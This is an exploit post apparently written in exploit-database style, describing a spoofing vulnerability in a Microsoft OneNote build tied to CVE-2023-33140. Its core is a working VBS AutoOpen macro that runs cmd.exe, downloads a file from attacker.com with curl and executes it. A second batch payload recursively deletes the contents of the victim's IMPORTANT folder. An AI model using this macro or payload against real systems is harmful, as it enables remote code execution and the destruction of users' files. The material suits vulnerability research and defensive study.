## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing Vulnerability ## Author: nu11secur1ty ## Date: 06.22.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app ## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected ## Description: Microsoft OneNote is vulnerable to spoofing attacks. The malicious user can trick the victim into clicking on a very maliciously crafted URL or download some other malicious file and execute it. When this happens the game will be over for the victim and his computer will be compromised. Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker. STATUS: 6.5 MEDIUM Vulnerability [+]Exploit: ```vbs Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus) End Sub ``` [+]Inside-exploit ``` @echo off del /s /q C:%HOMEPATH%\IMPORTANT\* ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html) ## Time spend: 01:15:00